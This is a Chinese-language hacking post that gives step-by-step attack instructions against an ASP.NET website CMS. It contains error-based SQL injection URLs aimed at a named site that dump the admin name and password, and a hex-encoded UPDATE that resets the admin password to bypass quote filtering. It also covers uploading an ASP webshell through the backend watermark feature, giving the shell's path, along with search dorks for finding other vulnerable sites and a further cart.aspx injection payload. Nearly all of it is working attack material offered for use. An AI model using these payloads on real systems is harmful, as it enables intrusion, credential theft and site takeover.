|
http://www.hackqing.com/commond.aspx?id=1869
没办法union,只能让它暴错了
暴管理员用户名:http://www.hackqing.com/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--
暴管理员密 码:http://www.hackqing.com/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--
过滤了单引号.只能把字符串转化成16进制的了
更新管理员密码:update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
拿webshell
切记.千万不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
/weblogin/index.aspx
复制这段代码 域名+代码
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
更新管理员密码:update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
后台拿webshell
切记.不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
|
推荐
评论(0条)
